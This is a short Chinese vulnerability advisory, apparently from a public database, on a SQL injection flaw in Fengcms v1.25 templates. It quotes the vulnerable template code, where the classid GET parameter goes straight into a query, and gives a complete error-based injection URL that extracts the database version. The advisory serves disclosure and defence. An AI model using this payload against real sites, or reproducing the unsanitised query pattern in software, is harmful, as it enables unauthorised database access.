Fengcms v1.25 SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 过滤不严,绕过并注入 ### 详细说明: Template/article.html和Template/article_class.html中 {$classid=$_GET[‘classid’]}//直接GET传入 ``` <div class="home_box"> <div class="boxtitle"> <h3>最新推荐</h3> </div> <ul class="list_12"> {loop M("module")->l("article","w[classid='$classid'&&attrib_j=1&&status=1];f[title,html,date];n[10];s[id,1]") $k $v} //classid直接带入查询 <li><span>{date('m/d',strtotime($v['date']))}</span><a href="{url($v['html'])}">{$v['title']}</a></li> {/loop} </ul> </div> 下面的一样,就省略了 ``` 这里显然已经有注入的潜质了,就看后面查询的时候有无过滤,试试直接报错注入 http://localhost/?controller=classify&project=article&classify=&classid=1'%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)# [<img src="https://images.seebug.org/upload/201408/111016237019335eecabf8ab07d01de400be9588.png" alt="QQ截图20140811101536.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/111016237019335eecabf8ab07d01de400be9588.png)...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息